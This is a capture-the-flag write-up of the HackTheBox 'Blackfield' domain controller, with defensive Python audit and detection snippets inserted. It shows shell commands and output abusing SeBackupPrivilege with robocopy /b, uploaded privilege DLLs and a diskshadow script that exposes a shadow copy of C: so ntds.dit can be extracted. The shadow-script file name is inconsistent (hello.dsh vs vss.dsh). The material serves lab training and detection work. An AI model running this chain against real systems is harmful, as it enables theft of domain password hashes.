*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
===================== ==============================================
blackfield\svc_backup S-1-5-21-4194615774-2175524697-3563712290-1413
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
We have SeBackupPrivilege and SeRestorePrivilege, both of which are dangerous: they let the holder bypass file permissions for backup and restore operations.
With both of these privileges, I can use robocopy to read files:
*Evil-WinRM* PS C:\programdata\temp> robocopy /b C:\users\administrator\desktop C:\programdata\temp
-------------------------------------------------------------------------------
ROBOCOPY :: Robust File Copy for Windows
-------------------------------------------------------------------------------
Started : Friday, January 12, 2024 1:50:10 PM
Source : C:\users\administrator\desktop\
Dest : C:\programdata\temp\
Files : *.*
Options : *.* /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30
------------------------------------------------------------------------------
3 C:\users\administrator\desktop\
New File 32 root.txt
2024/01/12 13:50:10 ERROR 5 (0x00000005) Copying File C:\users\administrator\desktop\root.txt
Access is denied.
No luck, I was not able to get root.txt.
I found this repo that exploits the above privileges: https://github.com/giuliano108/SeBackupPrivilege
On Windows, if a user has the "Back up files and directories" right, he gets assigned the SE_BACKUP_NAME/SeBackupPrivilege privilege. Such privilege is disabled by default but when switched on it allows the user to access directories/files that he doesn't own or doesn't have permission to. In MSDN's own words:
This user right determines which users can bypass file and directory, registry, and other persistent object permissions for the purposes of backing up the system.
In order to exploit SeBackupPrivilege you have to:
1. Enable the privilege. This alone lets you traverse (cd into) any directory, local or remote, and list (dir, Get-ChildItem) its contents.
2. If you want to read/copy data out of a "normally forbidden" folder, you have to act as backup software. The shell copy command won't work; you'll need to open the source file manually using CreateFile, making sure to specify the FILE_FLAG_BACKUP_SEMANTICS flag.
This library exposes three PowerShell CmdLets that do just that.
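As an added example (not from the page or the SeBackupPrivilege project), a small Python audit that parses whoami /all text like the output above and flags the Backup Operators membership and the two ACL-bypassing privileges just described. The sample excerpt is constructed from that output; the group SID and privilege names are the real Windows values.

```python
import re

# Privileges that bypass object ACLs (the point of the SeBackupPrivilege
# write-up above) and the built-in group that grants them on this box.
HIGH_RISK_PRIVILEGES = {"SeBackupPrivilege", "SeRestorePrivilege"}
HIGH_RISK_GROUP_SIDS = {"S-1-5-32-551": "BUILTIN\\Backup Operators"}

# Constructed excerpt mirroring the `whoami /all` output shown above;
# columns are whitespace-separated as they appear after extraction.
SAMPLE_WHOAMI = """\
USER INFORMATION
----------------
User Name SID
blackfield\\svc_backup S-1-5-21-4194615774-2175524697-3563712290-1413
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
BUILTIN\\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
"""

SID_RE = re.compile(r"\bS-1-\d+(?:-\d+)+\b")
PRIV_RE = re.compile(r"^(Se\w+Privilege)\b.*\b(Enabled|Disabled)$")

def audit_whoami(text):
    """Return the user plus any high-risk groups and privileges found."""
    user, groups, privs, section = None, [], [], None
    for line in (ln.strip() for ln in text.splitlines()):
        if line.endswith("INFORMATION"):        # section header
            section = line.split()[0]
        elif section == "USER" and user is None:
            m = SID_RE.search(line)             # first row with a SID is the user
            if m:
                user = line[:m.start()].strip()
        elif section == "GROUP":
            m = SID_RE.search(line)
            if m and m.group(0) in HIGH_RISK_GROUP_SIDS:
                groups.append(HIGH_RISK_GROUP_SIDS[m.group(0)])
        elif section == "PRIVILEGES":
            m = PRIV_RE.match(line)
            if m and m.group(1) in HIGH_RISK_PRIVILEGES:
                privs.append((m.group(1), m.group(2)))
    return {"user": user, "groups": groups, "privileges": privs}
```

Any account this reports with an enabled SeBackupPrivilege or SeRestorePrivilege should be treated as equivalent to a local administrator for file-access purposes.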
I need to upload these two files to the target.
*Evil-WinRM* PS C:\Users\svc_backup\Documents> upload /home/nakul/Desktop/ctf/htb/Blackfield/SeBackupPrivilege
/home/nakul/Desktop/ctf/htb/Blackfield/SeBackupPrivilegeCmdLets.dll
/home/nakul/Desktop/ctf/htb/Blackfield/SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\Users\svc_backup\Documents> upload /home/nakul/Desktop/ctf/htb/Blackfield/SeBackupPrivilegeUtils.dll
Import both modules:
*Evil-WinRM* PS C:\Users\svc_backup\Documents> Import-Module .\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\Users\svc_backup\Documents> Import-Module .\SeBackupPrivilegeCmdLets.dll
I tried to copy the ntds.dit file, the database on the DC that stores the domain's password hashes.
*Evil-WinRM* PS C:\programdata> Copy-FileSeBackupPrivilege C:\Windows\ntds\ntds.dit .
Opening input file. - The process cannot access the file because it is being used by another process. (Exception from HRESULT: 0x80070020)
At line:1 char:1
+ Copy-FileSeBackupPrivilege C:\Windows\ntds\ntds.dit .
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Copy-FileSeBackupPrivilege], Exception
+ FullyQualifiedErrorId : System.Exception,bz.OneOEight.SeBackupPrivilege.Copy_FileSeBackupPrivilege
The file is in use, so I can't copy it and then read it.
I found this article on exploiting these privileges: https://pentestlab.blog/tag/diskshadow/
It was trouble for me to get this working. After spending much time, I found this file:
set context persistent nowriters
set metadata c:\programdata\df.cab
set verbose on
add volume c: alias df
create
expose %df% z:
I used dos2unix on the file:
dos2unix hello.dsh
dos2unix: converting file hello.dsh to Unix format...
I uploaded hello.dsh to the target.
*Evil-WinRM* PS C:\programdata\temp> diskshadow /s c:\programdata\temp\vss.dsh
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC01, 1/12/2024 2:05:04 PM
-> set context persistent nowriters
-> set metadata c:\programdata\df.cab
-> set verbose on
-> add volume c: alias df
-> create
Alias df for shadow ID {1e79a0a6-a34a-432d-8146-55266a1b8c4e} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {e63fd451-7676-45f9-bb36-639ddf27f7de} set as environment variable.
Inserted file Manifest.xml into .cab file df.cab
Inserted file DisBACE.tmp into .cab file df.cab
Querying all shadow copies with the shadow copy set ID {e63fd451-7676-45f9-bb36-639ddf27f7de}
* Shadow copy ID = {1e79a0a6-a34a-432d-8146-55266a1b8c4e} %df%
- Shadow copy set: {e63fd451-7676-45f9-bb36-639ddf27f7de} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{6cd5140b-0000-0000-0000-602200000000}\ [C:\]
- Creation time: 1/12/2024 2:05:05 PM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
- Originating machine: DC01.BLACKFIELD.local
- Service machine: DC01.BLACKFIELD.local
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent No_Writers Differential
Number of shadow copies listed: 1
-> expose %df% z:
-> %df% = {1e79a0a6-a34a-432d-8146-55266a1b8c4e}
The shadow copy was successfully exposed as z:\.
->
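Added detection example, not part of the original write-up: Python that scans simplified, constructed Security-log records for the two signals this chain leaves, a 4672 logon that received SeBackupPrivilege/SeRestorePrivilege and a 4688 process creation of diskshadow.exe with /s or robocopy with /b, and correlates them per account. The one-line record format and the allowlist are assumptions; real 4672/4688 events are XML and need a different parser.

```python
import re

# Constructed, simplified Security-log records (one event per line, not the
# real Windows event XML) mirroring the activity in the write-up above.
SAMPLE_EVENTS = [
    "EventID=4672 Account=BLACKFIELD\\svc_backup Privileges=SeBackupPrivilege,SeRestorePrivilege",
    "EventID=4688 Account=BLACKFIELD\\svc_backup NewProcess=C:\\Windows\\System32\\diskshadow.exe CommandLine=diskshadow /s c:\\programdata\\temp\\vss.dsh",
    "EventID=4688 Account=BLACKFIELD\\svc_backup NewProcess=C:\\Windows\\System32\\Robocopy.exe CommandLine=robocopy /b C:\\users\\administrator\\desktop C:\\programdata\\temp",
    "EventID=4688 Account=BLACKFIELD\\user1 NewProcess=C:\\Windows\\System32\\notepad.exe CommandLine=notepad.exe",
    "EventID=4672 Account=BLACKFIELD\\Administrator Privileges=SeDebugPrivilege,SeBackupPrivilege",
]

BACKUP_PRIVS = {"SeBackupPrivilege", "SeRestorePrivilege"}
# Accounts expected to log on with backup rights (constructed allowlist).
EXPECTED_BACKUP_ACCOUNTS = {"BLACKFIELD\\Administrator"}

FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s\w+=|$)")

def parse_event(line):
    """Split a 'Key=value Key=value' record; values may contain spaces."""
    return dict(FIELD_RE.findall(line))

def detect(lines):
    """Return (severity, account, reason) alerts; a 4688 hit by an account
    that already received backup rights (4672) is raised to high."""
    alerts, priv_accounts = [], set()
    for line in lines:
        ev = parse_event(line)
        acct = ev.get("Account", "")
        if ev.get("EventID") == "4672":
            privs = set(ev.get("Privileges", "").split(","))
            if privs & BACKUP_PRIVS and acct not in EXPECTED_BACKUP_ACCOUNTS:
                priv_accounts.add(acct)
                alerts.append(("medium", acct, "logon with backup/restore privilege"))
        elif ev.get("EventID") == "4688":
            exe = ev.get("NewProcess", "").rsplit("\\", 1)[-1].lower()
            args = ev.get("CommandLine", "").lower().split()
            reason = None
            if exe == "diskshadow.exe" and "/s" in args:
                reason = "scripted diskshadow run (shadow copy of a live volume)"
            elif exe == "robocopy.exe" and "/b" in args:
                reason = "robocopy in backup mode (/b)"
            if reason:
                sev = "high" if acct in priv_accounts else "medium"
                alerts.append((sev, acct, reason))
    return alerts
```

On a domain controller, the persistent shadow copy created this way also survives until removed, so checking for unexpected shadow copies (vssadmin list shadows) is a useful follow-up to any high alert.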